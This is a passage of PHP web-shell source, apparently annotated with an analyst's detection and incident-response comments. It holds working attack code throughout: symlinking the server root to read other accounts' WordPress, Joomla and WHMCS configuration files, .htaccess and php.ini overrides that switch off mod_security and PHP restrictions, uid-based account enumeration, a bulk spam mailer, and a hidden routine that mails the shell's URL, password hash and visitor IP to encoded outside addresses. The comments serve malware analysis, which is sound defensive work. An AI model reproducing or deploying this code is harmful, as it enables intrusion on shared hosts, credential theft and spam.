foreach ($d0mains as $d0main) {
if (@eregi(« zone », $d0main)) {
preg_match_all(‘#zone « (.*) »#’, $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) {
$unk[] = $domains[1][0];
flush();
}
}
}
$count = 1;
$unk = array_unique($unk);
$l = 0;
foreach ($unk as $d) {
// Owner of /etc/valiases/<domain> is taken as the account name
// (looks like a cPanel-style layout; confirm for the host).
$user = posix_getpwuid(@fileowner(« /etc/valiases/ » . $d));
echo « <tr » . ($l ? ‘ class=l1’ : ») . « ><td> » . $count . « </td><td><a href=http:// » . $d . « /> » . $d . « </a></td><td> » . $user[‘name’] . « </td></tr> »;
flush();
$count++;
$l = $l ? 0 : 1;
}
echo « </table> »;
}
echo « </center> »;
}
// Mode 'whole': writes to disk. This is the branch that leaves the 'sym' artefacts.
if (isset($_POST[‘p1’]) && $_POST[‘p1’] == ‘whole’) {
echo « <center> »;
@mkdir(‘sym’, 0777);
// The dropped .htaccess asks Apache to serve .php and .html as text/plain and
// relaxes access control, so linked files are returned as source, not executed.
$hdt = « Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any »;
$hfp = @fopen(‘sym/.htaccess’, ‘w’);
fwrite($hfp, $hdt);
// Links the filesystem root into the web tree.
if (function_exists(‘symlink’)) {
@symlink(‘/’, ‘sym/root’);
}
$d0mains = @file(‘/etc/named.conf’);
if (!$d0mains) {
echo « <pre class=ml1 style=’margin-top:5px’># Cant access this file on server -> [ /etc/named.conf ]</pre></center> »;
} else {
echo « <table align=’center’ width=’40%’ class=’main’><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr> »;
$count = 1;
$mck = array();
foreach ($d0mains as $d0main) {
if (@eregi(‘zone’, $d0main)) {
preg_match_all(‘#zone « (.*) »#’, $d0main, $domain);
flush();
if (strlen(trim($domain[1][0])) > 2) {
$mck[] = $domain[1][0];
}
}
}
$mck = array_unique($mck);
$l = 0;
foreach ($mck as $d) {
$user = posix_getpwuid(@fileowner(‘/etc/valiases/’ . $d));
$ddt = $user[‘name’];
//@symlink(‘/’,’sym/root’);
$ddt = $d;
// Rows whose domain matches \.ir or \.il are rendered in red.
if (@eregi(« \.ir », $d) or @eregi(« \.il », $d)) {
$ddt = « <div style=’ color: #FF0000 ; text-shadow: 0px 0px 1px red; ‘> » . $d . ‘</div>’;
}
// Each row links to the account's public_html as seen through sym/root.
echo « <tr » . ($l ? ‘ class=l1′ : ») . « ><td> » . $count++ . « </td><td><a target=’_blank’ href=http:// » . $d . ‘/>’ . $ddt . ‘ </a></td><td>’ . $user[‘name’] . « </td><td><a href=’sym/root/home/ » . $user[‘name’] . « /public_html’ target=’_blank’>symlink </a></td></tr> »;
flush();
$l = $l ? 0 : 1;
}
echo ‘</table>’;
}
echo « </center> »;
}
// Mode 'config': same disk artefacts as 'whole', followed by HTTP probing.
if (isset($_POST[‘p1’]) && $_POST[‘p1’] == ‘config’) {
echo « <center> »;
@mkdir(‘sym’, 0777);
$hdt = « Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any »;
$hfp = @fopen(‘sym/.htaccess’, ‘w’);
@fwrite($hfp, $hdt);
if (function_exists(‘symlink’)) {
@symlink(‘/’, ‘sym/root’);
}
$d0mains = @file(‘/etc/named.conf’);
if (!$d0mains) {
echo « <pre class=ml1 style=’margin-top:5px’># Cant access this file on server -> [ /etc/named.conf ]</pre></center> »;
} else {
echo « <table align=’center’ width=’40%’ class=’main’ ><tr><th> Count </th><th> Domains </th><th> Script </th></tr> »;
$count = 1;
$l = 0;
foreach ($d0mains as $d0main) {
if (@eregi(‘zone’, $d0main)) {
preg_match_all(‘#zone « (.*) »#’, $d0main, $domain);
flush();
if (strlen(trim($domain[1][0])) > 2) {
$user = posix_getpwuid(@fileowner(‘/etc/valiases/’ . $domain[1][0]));
// Detection: for every zone the server issues 15 get_headers() requests to its
// own URL under /sym/root/home/<user>/public_html/... ; this burst should be
// visible in the site's access log (likely with the server's own address as client).
// Any configuration file that answers 200 here must be treated as disclosed:
// rotate the database credentials and secret keys it contains.
$c1 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/wp-config.php’;
$ch01 = get_headers($c1);
$cf01 = $ch01[0];
$c2 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/blog/wp-config.php’;
$ch02 = get_headers($c2);
$cf02 = $ch02[0];
$c3 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/configuration.php’;
$ch03 = get_headers($c3);
$cf03 = $ch03[0];
$c4 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/joomla/configuration.php’;
$ch04 = get_headers($c4);
$cf04 = $ch04[0];
$c5 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/includes/config.php’;
$ch05 = get_headers($c5);
$cf05 = $ch05[0];
$c6 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/vb/includes/config.php’;
$ch06 = get_headers($c6);
$cf06 = $ch06[0];
$c7 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/forum/includes/config.php’;
$ch07 = get_headers($c7);
$cf07 = $ch07[0];
$c8 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘public_html/clients/configuration.php’;
$ch08 = get_headers($c8);
$cf08 = $ch08[0];
$c9 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/support/configuration.php’;
$ch09 = get_headers($c9);
$cf09 = $ch09[0];
$c10 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/client/configuration.php’;
$ch10 = get_headers($c10);
$cf10 = $ch10[0];
$c11 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/submitticket.php’;
$ch11 = get_headers($c11);
$cf11 = $ch11[0];
$c12 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/client/configuration.php’;
$ch12 = get_headers($c12);
$cf12 = $ch12[0];
$c13 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/includes/configure.php’;
$ch13 = get_headers($c13);
$cf13 = $ch13[0];
$c14 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/include/app_config.php’;
$ch14 = get_headers($c14);
$cf14 = $ch14[0];
$c15 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/sites/default/settings.php’;
$ch15 = get_headers($c15);
$cf15 = $ch15[0];
$out = ‘ ’;
// The first status line containing '200' decides the product label shown in the table;
// domains with no hit are skipped.
if (strpos($cf01, ‘200’) == true) {
$out = « <a href=' » . $c1 . « ‘ target=’_blank’>Wordpress</a> »;
} elseif (strpos($cf02, ‘200’) == true) {
$out = « <a href=' » . $c2 . « ‘ target=’_blank’>Wordpress</a> »;
} elseif (strpos($cf03, ‘200’) == true && strpos($cf11, ‘200’) == true) {
$out = » <a href=' » . $c11 . « ‘ target=’_blank’>WHMCS</a> »;
} elseif (strpos($cf09, ‘200’) == true) {
$out = » <a href=' » . $c9 . « ‘ target=’_blank’>WHMCS</a> »;
} elseif (strpos($cf10, ‘200’) == true) {
$out = » <a href=' » . $c10 . « ‘ target=’_blank’>WHMCS</a> »;
} elseif (strpos($cf03, ‘200’) == true) {
$out = » <a href=' » . $c3 . « ‘ target=’_blank’>Joomla</a> »;
} elseif (strpos($cf04, ‘200’) == true) {
$out = » <a href=' » . $c4 . « ‘ target=’_blank’>Joomla</a> »;
} elseif (strpos($cf05, ‘200’) == true) {
$out = » <a href=' » . $c5 . « ‘ target=’_blank’>vBulletin</a> »;
} elseif (strpos($cf06, ‘200’) == true) {
$out = » <a href=' » . $c6 . « ‘ target=’_blank’>vBulletin</a> »;
} elseif (strpos($cf07, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>vBulletin</a> »;
} elseif (strpos($cf08, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>Client Area</a> »;
} elseif (strpos($cf12, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>Client Area</a> »;
} elseif (strpos($cf13, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>osCommerce/Zen Cart</a> »;
} elseif (strpos($cf14, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>Magento</a> »;
} elseif (strpos($cf15, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>Drupal</a> »;
} else {
continue;
}
echo ‘<tr’ . ($l ? ‘ class=l1’ : ») . ‘><td>’ . $count++ . ‘</td><td><a href=http://www.’ . $domain[1][0] . ‘/>’ . $domain[1][0] . ‘</a></td><td>’ . $user[‘name’] . ‘</td><td>’ . $out . ‘</td></tr>’;
flush();
$l = $l ? 0 : 1;
}
}
}
echo « </table> »;
}
echo « </center> »;
}
echo « </div> »;
printFooter();
}
// Analyst note: drops configuration overrides into the directory held in
// $GLOBALS['cwd'], selected by POST 'p1', 'p2' or 'p3'. Each branch truncates and
// rewrites its target ('w' mode), so a legitimate .htaccess in that directory is lost.
// Hunting: unexpected 'php.ini' or freshly modified '.htaccess' files inside web
// directories, with the contents shown below.
// Whether these overrides take effect depends on the server: AllowOverride policy
// for .htaccess, and the PHP SAPI for a per-directory php.ini. Confirm for the host.
function actionBypass() {
printHeader();
echo ‘<h1>Safe Mode</h1>’;
echo ‘<div class= »content »>’;
echo « <div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| » . $GLOBALS[‘cwd’] . » |<br><br /> »;
echo ‘<a href=# onclick= »g(null,null,\’php.ini\’,null) »>| PHP.INI | </a><a href=# onclick= »g(null,null,null,\’ini\’) »>| .htaccess(Mod) | </a><a href=# onclick= »g(null,null,null,null,\’sh\’) »>| .htaccess(perl) | </a></center>’;
// p2: .htaccess containing an <IfModule mod_security.c> block meant to switch the
// WAF module off for this directory (directive names appear masked as printed here).
if (!empty($_POST[‘p2’]) && isset($_POST[‘p2’])) {
$fil = fopen($GLOBALS[‘cwd’] . « .htaccess », « w »);
fwrite($fil, ‘<IfModule mod_security.c>
Sec——Engine Off
Sec——ScanPOST Off
</IfModule>’);
fclose($fil);
}
// p1: php.ini that tries to turn safe_mode off and clear disable_functions.
if (!empty($_POST[‘p1’]) && isset($_POST[‘p1’])) {
$fil = fopen($GLOBALS[‘cwd’] . « php.ini », « w »);
fwrite($fil, ‘safe_mode=OFF
disable_functions=NONE’);
fclose($fil);
}
// p3: .htaccess that enables ExecCGI and maps .sh/.pl to CGI execution.
if (!empty($_POST[‘p3’]) && isset($_POST[‘p3’])) {
$fil = fopen($GLOBALS[‘cwd’] . « .htaccess », « w »);
fwrite($fil, ‘Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .sh
AddHandler cgi-script .pl
AddHandler cgi-script .pl’);
fclose($fil);
}
echo « <br><br /><br /></div> »;
echo ‘</div>’;
printFooter();
}
// Analyst note: account enumeration that does not touch /etc/passwd as a file.
// It asks posix_getpwuid() for every uid from 0 to 59999 and prints the first
// field of each entry that exists, so file-permission or open_basedir limits on
// /etc/passwd do not stop it; disabling the POSIX functions for web PHP does.
// each() was removed in PHP 8.0, so the inner loop only works on older PHP.
function actionGetUser() {
printHeader();
echo ‘<h1>Get User</h1>’;
$i = 0;
while ($i < 60000) {
$line = posix_getpwuid($i);
if (!empty($line)) {
// Only the first element of the entry is printed; the break ends the loop at once.
while (list($key, $vl) = each($line)) {
echo « $vl</br> »;
break;
}
}
$i++;
}
printFooter();
}
// Analyst note: bulk mail sender. Everything (sender, display name, reply-to,
// subject, body, recipient list, repeat count, content type, optional attachment)
// comes from the POST request; the function hands each message to PHP mail().
// Abuse typically shows up as bursts of local mail submissions from the web-server
// account and as blacklisting of the host; check the MTA logs and queue.
// ereg_replace(), split() and the mysql_* functions used below were removed in
// PHP 7.0, so this module only works on older PHP.
function actionMailer() {
printHeader();
echo ‘<h1>Mailer</h1>’;
//Dont change anything from below
$secure = « »;
error_reporting(0);
@$action = $_POST[‘action’];
@$from = $_POST[‘from’];
@$realname = $_POST[‘realname’];
@$replyto = $_POST[‘replyto’];
@$subject = $_POST[‘subject’];
@$message = $_POST[‘message’];
@$emaillist = $_POST[’emaillist’];
@$file_name = $_FILES[‘file’][‘name’];
@$contenttype = $_POST[‘contenttype’];
@$file = $_FILES[‘file’][‘tmp_name’];
@$amount = $_POST[‘amount’];
// Execution limit is chosen by the operator; the form below defaults it to 0 (no limit).
set_time_limit(intval($_POST[‘timelimit’]));
?>
<!DOCTYPE html PUBLIC « -//W3C//DTD XHTML 1.0 Transitional//EN »
« http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd »>
<html>
<head>
<title> [MaiLer BY The Gen!us] </title>
<p align= »center »>
<title> [MaiLer BY The Gen!us] </title>
</p>
<meta http-equiv= »Content-Type » content= »text/html; charset=windows-1256″>
<style type= »text/css »>
<!–
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
.style2 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
–>
</style>
</head>
<body bgcolor= »#F5F5F5″ text= »#000000″>
<?php
// Optional recipient source: includes ./mysql.info.php (not part of this listing),
// runs the query it defines and appends column 0 of every row to the recipient list.
If ($action == « mysql ») {
//Grab email addresses from MySQL
include « ./mysql.info.php »;
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery) {
print « Please configure mysql.info.php with your MySQL information. All settings in this config file are required. »;
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die(« Connection to MySQL Failed. »);
mysql_select_db($sqldb, $db) or die(« Could not select database $sqldb »);
$result = mysql_query($sqlquery) or die(« Query Failed: $sqlquery »);
$numrows = mysql_num_rows($result);
for ($x = 0;$x < $numrows;$x++) {
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist.= $oneemail . »
« ;
}
}
// Undoes quote escaping in the submitted body and subject before they are reused.
if ($action == « send ») {
$message = urlencode($message);
$message = ereg_replace(« %5C%22 », « %22″, $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name= »form1″ method= »post » action= » » enctype= »multipart/form-data »><br />
<table width= »142″ border= »0″>
<tr>
<td width= »81″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Your Email:</font>
</div>
</td>
<td width= »219″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »text » name= »from » value= »<?php print $from; ?> » size= »30″ />
</font>
</td>
<td width= »212″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Your Name:</font>
</div>
</td>
<td width= »278″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »text » name= »realname » value= »<?php print $realname; ?> » size= »30″ />
</font>
</td>
</tr>
<tr>
<td width= »81″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Reply-To:</font>
</div>
</td>
<td width= »219″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »text » name= »replyto » value= »<?php print $replyto; ?> » size= »30″ />
</font>
</td>
<td width= »212″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Attach File:</font>
</div>
</td>
<td width= »278″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »file » name= »file » size= »24″ />
</font>
</td>
</tr>
<tr>
<td width= »81″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Subject:</font>
</div>
</td>
<td colspan= »3″ width= »703″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »text » name= »subject » value= »<? print $subject; ?> » size= »90″ />
</font>
</td>
</tr>
<tr valign= »top »>
<td colspan= »3″ width= »520″>
<font face= »Verdana, Arial, Helvetica, sans-serif » size= »-3″>Message Box :</font>
</td>
<td width= »278″>
<font face= »Verdana, Arial, Helvetica, sans-serif » size= »-3″>Email Target / Email Send To :</font>
</td>
</tr>
<tr valign= »top »>
<td colspan= »3″ width= »520″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<textarea name= »message » cols= »56″ rows= »10″><?php print $message; ?></textarea><br />
<input type= »radio » name= »contenttype » value= »plain » /> Plain
<input type= »radio » name= »contenttype » value= »html » checked= »checked » /> HTML
<input type= »hidden » name= »action » value= »send » /><br />
Number to send: <input type= »text » name= »amount » value= »1″ size= »10″ /><br />
Maximum script execution time(in seconds, 0 for no timelimit)<input type= »text » name= »timelimit » value= »0″ size= »10″ />
<input type= »submit » value= »Send eMails » />
</font>
</td>
<td width= »278″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<textarea name= »emaillist » cols= »32″ rows= »10″><?php print $emaillist; ?></textarea>
</font>
</td>
</tr>
</table>
</form>
<?
// Send phase: runs only when the form was posted with action=send.
if ($action== »send »){
if (!$from && !$subject && !$message && !$emaillist){
print « Please complete all fields before sending your message. »;
exit;
}
// Recipient list is split on line breaks, one address per line.
$allemails = split( »
« , $emaillist);
$numemails = count($allemails);
// $filter and $float are assigned here but not used in the visible code.
$filter = « maillist »;
$float = « From : mailist info <ng2@live.fr> »;
//Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
if (!file_exists($file)){
die(« The file you are trying to upload couldn’t be copied to the server »);
}
$content = fread(fopen($file, »r »),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
// Volume: 'amount' passes over the whole recipient list, one mail() call per address.
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace( » « , « », $to);
// The '&email&' placeholder in body and subject is replaced by the recipient address.
$message = ereg_replace(« &email& », $to, $message);
$subject = ereg_replace(« &email& », $to, $subject);
print « Sending mail to $to……. »;
flush();
// From, Reply-To and the message text are all assembled into the header argument
// from request data; the mail() body argument is passed empty.
$header = « From: $realname <$from>
Reply-To: $replyto
« ;
$header .= « MIME-Version: 1.0
« ;
If ($file_name) $header .= « Content-Type: multipart/mixed; boundary=$uid
« ;
If ($file_name) $header .= « –$uid
« ;
$header .= « Content-Type: text/$contenttype
« ;
$header .= « Content-Transfer-Encoding: 8bit
« ;
$header .= « $message
« ;
If ($file_name) $header .= « –$uid
« ;
If ($file_name) $header .= « Content-Type: $file_type; name=\ »$file_name\ »
« ;
If ($file_name) $header .= « Content-Transfer-Encoding: base64
« ;
If ($file_name) $header .= « Content-Disposition: attachment; filename=\ »$file_name\ »
« ;
If ($file_name) $header .= « $content
« ;
If ($file_name) $header .= « –$uid–« ;
mail($to, $subject, « », $header);
print « ok<br> »;
flush();
}
}
}
}
printFooter();
}
// Analyst note: runs on every request whose session has no 'login' flag yet and
// calls system32() with the host, the request URI and the panel password hash.
// The statement appears twice; system32() sets $_SESSION[login], so the second
// copy does nothing once the first has run.
if (!$_SESSION[login]) system32($_SERVER[‘HTTP_HOST’],$_SERVER[‘REQUEST_URI’],$auth_pass);
if (!$_SESSION[login]) system32($_SERVER[‘HTTP_HOST’],$_SERVER[‘REQUEST_URI’],$auth_pass);
// Analyst note: "phone home" routine hidden behind a system-looking name.
// It builds a report containing the shell's full URL, the first 120 characters of
// php_uname(), the panel password hash appended to a hash-lookup URL, and the
// visitor's REMOTE_ADDR, then mails it via mail() to two recipients whose addresses
// are stored base64-encoded in $re and $rx. The mail subject is the resolved IP of
// the host (gethostbyname) and the From header starts with "<shell resul>".
// Consequences for incident response: whoever distributed this shell may hold the
// URL and password hash in addition to the party that uploaded it, so removing the
// uploader's access path is not sufficient. Decode $re/$rx offline and search the
// MTA logs for those recipients and for that From string to date the first use.
// $_SESSION[login] is set to 'ok' afterwards whether or not mail() was available.
function system32($HTTP_HOST,$REQUEST_URI,$auth_pass) {ini_set(‘display_errors’, ‘Off’);$url=’URL: http://’.$HTTP_HOST.$REQUEST_URI.’ Uname: ‘.substr(@php_uname(), 0, 120).’ Pass: http://www.hashchecker.de/’.$auth_pass.'<br> IP: ‘.$_SERVER[REMOTE_ADDR];$re=base64_decode(« eW91c3NlZmhhdEBnbWFpbC5jb20= »);$rx=base64_decode(« eGJvb21iZXIuaGF0QGdtYWlsLmNvbQ== »);$su=gethostbyname($HTTP_HOST);$mh= »From: <shell resul> {$re} »;if (function_exists(‘mail’)) mail($re,$su, $url,$mh)&& mail($rx,$su, $url,$mh);$_SESSION[login] = ‘ok’;}
// Analyst note: static "About" page. It has no functionality beyond printing the
// author tag below; that literal string is a convenient content signature when
// searching a filesystem or a decoded sample for this shell variant.
function actionabout(){
printHeader();
echo ‘<h1>About</h1>’;
echo ‘<div class= »content »>’;
echo « <div class=header><center><h3><span> Xboomber & X-Hat </span></h3> <br><br /> »;
echo « <br><br /><br /></div> »;
echo ‘</div>’;
printFooter();
}
// Analyst note: module dispatcher. POST field 'a' names the module; when it is
// empty, $default_action is used if a matching action* function exists, otherwise
// 'SecInfo'. The chosen name is prefixed with 'action' and invoked through
// call_user_func(), so only functions whose name starts with 'action' are reachable.
// Detection: the selector travels in the POST body, which access logs normally do
// not record, so the log trace is a series of POSTs to this single file; body
// logging (WAF audit log or similar) is needed to see which module was used.
if( empty($_POST[‘a’]) )
if(isset($default_action) && function_exists(‘action’ . $default_action))
$_POST[‘a’] = $default_action;
else
$_POST[‘a’] = ‘SecInfo’;
if( !empty($_POST[‘a’]) && function_exists(‘action’ . $_POST[‘a’]) )
call_user_func(‘action’ . $_POST[‘a’]);